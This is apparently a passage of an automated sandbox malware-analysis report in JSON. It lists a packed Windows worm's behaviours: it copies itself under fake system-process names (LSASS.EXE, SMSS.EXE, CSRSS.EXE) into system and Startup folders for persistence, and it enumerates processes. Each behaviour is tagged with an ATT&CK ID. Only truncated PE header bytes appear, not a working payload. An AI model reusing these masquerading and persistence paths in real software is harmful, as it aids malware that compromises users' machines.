4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46754 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46719 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46902 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46877 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46772 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46926 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46776 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46956 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46886 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46811 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46896 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46963 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46827 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46847 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46771 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46738 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46837 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46800 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46864 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46883 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46799 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46748 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46814 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46851 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46763 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46728 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46837 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46872 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46794 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46843 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46885 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000404]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00000404]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000404]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000404]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000404]\n \"4K51K4.EXE.67A9C469.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000404]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000404]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00000404]\n \"4K51K4.EXE.67A9C7EE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C717.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000404]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000404]\n \"IEXPLORER.EXE.67A9C46B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C719.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00000404]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"IEXPLORER.EXE.67A9C7F1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00000404]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS .exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"IExplorer.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"New Folder.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Data HAPUBWS.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C469.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SMSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C7EE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C717.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C46B.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C719.bin\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToLocalFileTime\" with parameter 125c575f947bdb01 & 12c41bc19c7bdb01 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToLocalFileTime\" with parameter 9472df71947bdb01 & 94daa3d39c7bdb01 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToLocalFileTime\" with parameter f4d3e171947bdb01 & f43ba6d39c7bdb01 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToLocalFileTime\" with parameter d5baed71947bdb01 & d522b2d39c7bdb01 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FileTimeToLocalFileTime\" with parameter bbb71f72947bdb01 & bb1fe4d39c7bdb01 (UID: 00000000-00005712)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"Process32NextW with parameter lsass.exe\" 